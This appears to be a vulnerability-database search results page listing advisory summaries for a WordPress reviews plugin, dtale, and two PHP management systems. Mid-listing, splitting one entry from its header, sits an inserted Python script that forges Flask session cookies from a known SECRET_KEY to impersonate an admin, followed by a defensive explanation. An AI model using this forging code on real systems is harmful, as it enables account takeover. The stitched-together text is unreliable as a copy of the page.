Lucene search

9 matches found

RedhatCVE · added 2026/06/10 8:59 a.m. · 11 views

CVE-2026-8499

The Helpfulcrowd Product Reviews plugin for WordPress is vulnerable to Authorization Bypass via PHP Type Juggling in versions up to, and including, 1.2.9. This is due to the helpfulcrowd_validate_token function using the loose comparison operator != instead of the strict comparison !== when validating...

CVSS 5.3 · AI score 5.6 · EPSS 0.00273
Exploits 0 · References 1

Vulnrichment · added 2026/06/09 3:41 a.m. · 9 views

CVE-2026-8499 Helpfulcrowd Product Reviews <= 1.2.9 - Incorrect Authorization via Type Juggling in 'token' Parameter to Arbitrary Settings Update

The Helpfulcrowd Product Reviews plugin for WordPress is vulnerable to Authorization Bypass via PHP Type Juggling in versions up to, and including, 1.2.9. This is due to the helpfulcrowd_validate_token function using the loose comparison operator != instead of the strict comparison !== when validating...

CVSS 5.3 · AI score 5.6 · EPSS 0.00273
Exploits 0 · References 4

Positive Technologies · added 2026/06/09 12:00 a.m. · 12 views

PT-2026-47672

Name of the Vulnerable Software and Affected Versions: Helpfulcrowd Product Reviews versions prior to 1.3.0. Description: The Helpfulcrowd Product Reviews plugin for WordPress allows unauthenticated authorization bypass due to PHP Type Juggling. This occurs because the helpfulcrowd_validate_token...

CVSS 5.3 · AI score 5.5 · EPSS 0.00273
Exploits 0 · References 7

Snyk · added 2024/12/13 8:36 p.m. · 3 views

Cross-site Scripting (XSS)

Overview: dtale is a Web Client for Visualizing Pandas Objects. Affected versions of this package are vulnerable to Cross-site Scripting (XSS) through the update-settings endpoint, allowing an attacker to use enable_custom_filters to specify custom filters that will be used for exploitation of this...

CVSS 6.9 · AI score 5.3 · EPSS 0.01063
Exploits 0 · References 2

Veracode · added 2024/06/10 7:23 a.m. · 20 views

Authentication Bypass / Remote Code Execution (RCE)

dtale is vulnerable to Authentication Bypass / Remote Code Execution (RCE). The vulnerability is due to improper input validation and the presence of a hardcoded SECRET_KEY in the Flask configuration, allowing attackers to forge a session cookie. Additionally, there is improper validation of custom...

CVSS 9.8 · AI score 8.2 · EPSS 0.77951
Exploits 5 · References 4 · Affected Software 1

Vulnrichment · added 2024/06/06 6:54 p.m. · 24 views

CVE-2024-3408 Authentication Bypass and RCE in man-group/dtale

man-group/dtale version 3.10.0 is vulnerable to an authentication bypass and remote code execution (RCE) due to improper input validation. The vulnerability arises from a hardcoded SECRET_KEY in the Flask configuration, allowing attackers to forge a session cookie if authentication is enabled...

CVSS 9.8 · AI score 8.5 · EPSS 0.77951
Exploits 5 · References 2

Positive Technologies · added 2024/02/28 12:00 a.m. · 2 views

PT-2024-25690

Name of the Vulnerable Software and Affected Versions: man-group/dtale version 3.10.0. Description: The issue arises from improper input validation, leading to an authentication bypass and remote code execution (RCE). A hardcoded SECRET_KEY in the Flask configuration allows attackers to forge a sessio...

CVSS 10 · AI score 8.8 · EPSS 0.77951
Exploits 5 · References 17

Positive Technologies · added 2022/12/07 12:00 a.m. · 7 views
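The three dtale entries above all turn on the same point: once SECRET_KEY is known (here, hardcoded in the Flask configuration), anyone can mint a session cookie that the server accepts as genuine. The following is an added example, not code from dtale, Flask or any advisory on this page. It reimplements the itsdangerous URLSafeTimedSerializer format that Flask uses for its session cookie (salt "cookie-session", HMAC-SHA1 key derivation, dot-separated payload/timestamp/signature) using only the standard library so it runs without Flask installed; format compatibility with a live Flask instance is assumed and should be checked against one before relying on it. The key value and the session fields are constructed placeholders, not the real dtale values.

```python
"""Forge and verify Flask-style session cookies when SECRET_KEY is known.

Added example (not dtale's or Flask's own code). Reproduces the itsdangerous
URLSafeTimedSerializer layout Flask uses for sessions from the stdlib so it
runs offline; compatibility with a real Flask app is an assumption to verify.
"""
import base64
import hashlib
import hmac
import json
import time
import zlib

# Constructed placeholder. The real hardcoded dtale key is deliberately not
# reproduced here; the point is that the value is in the source, so it is public.
LEAKED_SECRET_KEY = "hardcoded-example-key-from-source"

# Flask's fixed salt for the session cookie serializer.
SALT = b"cookie-session"


def _b64(raw: bytes) -> bytes:
    """URL-safe base64 without padding, as itsdangerous encodes fields."""
    return base64.urlsafe_b64encode(raw).rstrip(b"=")


def _b64d(data: bytes) -> bytes:
    """Inverse of _b64: re-add padding before decoding."""
    return base64.urlsafe_b64decode(data + b"=" * (-len(data) % 4))


def _signing_key(secret_key: str) -> bytes:
    """itsdangerous 'hmac' key derivation: HMAC-SHA1(secret_key, salt)."""
    return hmac.new(secret_key.encode(), SALT, hashlib.sha1).digest()


def forge_session_cookie(session: dict, secret_key: str, timestamp=None) -> str:
    """Produce a cookie value for `session` exactly as a server holding
    `secret_key` would. No server interaction is needed: the key is the
    only secret in the scheme."""
    payload = json.dumps(session, separators=(",", ":"), sort_keys=True).encode()
    # itsdangerous zlib-compresses the payload when that makes it shorter and
    # marks the compressed form with a leading ".".
    compressed = zlib.compress(payload)
    if len(compressed) < len(payload) - 1:
        body = b"." + _b64(compressed)
    else:
        body = _b64(payload)
    ts = int(time.time()) if timestamp is None else timestamp
    ts_bytes = ts.to_bytes((ts.bit_length() + 7) // 8, "big")
    value = body + b"." + _b64(ts_bytes)
    sig = hmac.new(_signing_key(secret_key), value, hashlib.sha1).digest()
    return (value + b"." + _b64(sig)).decode()


def verify_session_cookie(cookie: str, secret_key: str, max_age=None, now=None):
    """Server-side check: return the session dict if the signature (and,
    optionally, the age) is valid, else None. Mirrors what a Flask app does
    on every request, which is why a forged cookie is indistinguishable."""
    try:
        value, sig_b64 = cookie.encode().rsplit(b".", 1)
        body, ts_b64 = value.rsplit(b".", 1)
        expected = hmac.new(_signing_key(secret_key), value, hashlib.sha1).digest()
        if not hmac.compare_digest(expected, _b64d(sig_b64)):
            return None
        ts = int.from_bytes(_b64d(ts_b64), "big")
        if max_age is not None:
            current = int(time.time()) if now is None else now
            if current - ts > max_age:
                return None
        raw = zlib.decompress(_b64d(body[1:])) if body.startswith(b".") else _b64d(body)
        return json.loads(raw)
    except (ValueError, zlib.error):
        return None


if __name__ == "__main__":
    # Hypothetical session contents; the field names are illustrative only.
    forged = forge_session_cookie({"logged_in": True, "username": "admin"}, LEAKED_SECRET_KEY)
    print("Cookie: session=" + forged)
    print("Server accepts as:", verify_session_cookie(forged, LEAKED_SECRET_KEY))
    print("Other key accepts:", verify_session_cookie(forged, "a-different-key"))
```

The defensive reading is the same code path: the only thing that distinguishes a forged cookie from a real one is possession of SECRET_KEY, so the fix is a key generated per deployment (for example from `secrets.token_bytes(32)`) and supplied at runtime, never a literal in the repository. Rotating the key invalidates every existing session, which is the intended effect after a leak.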

PT-2022-27364 · Unknown · Online Leave Management System

Name of the Vulnerable Software and Affected Versions: Online Leave Management System version 1.0. Description: The issue allows attackers to execute arbitrary code via a crafted PHP file, exploiting an arbitrary file upload vulnerability at the "/leave_system/classes/SystemSettings.php?f=update...

CVSS 7.2 · AI score 7.9 · EPSS 0.01034
Exploits 1 · References 3

Positive Technologies · added 2022/10/17 12:00 a.m. · 4 views

PT-2022-26282 · Unknown · Online Tours & Travels Management System

Name of the Vulnerable Software and Affected Versions: Online Tours & Travels Management System version 1.0. Description: The issue concerns arbitrary code execution. It can be exploited via the "ip/tour/admin/operations/update_settings.php" API endpoint. Recommendations: For Online Tours & Travel...

CVSS 7.2 · AI score 7.3 · EPSS 0.01034
Exploits 1 · References 3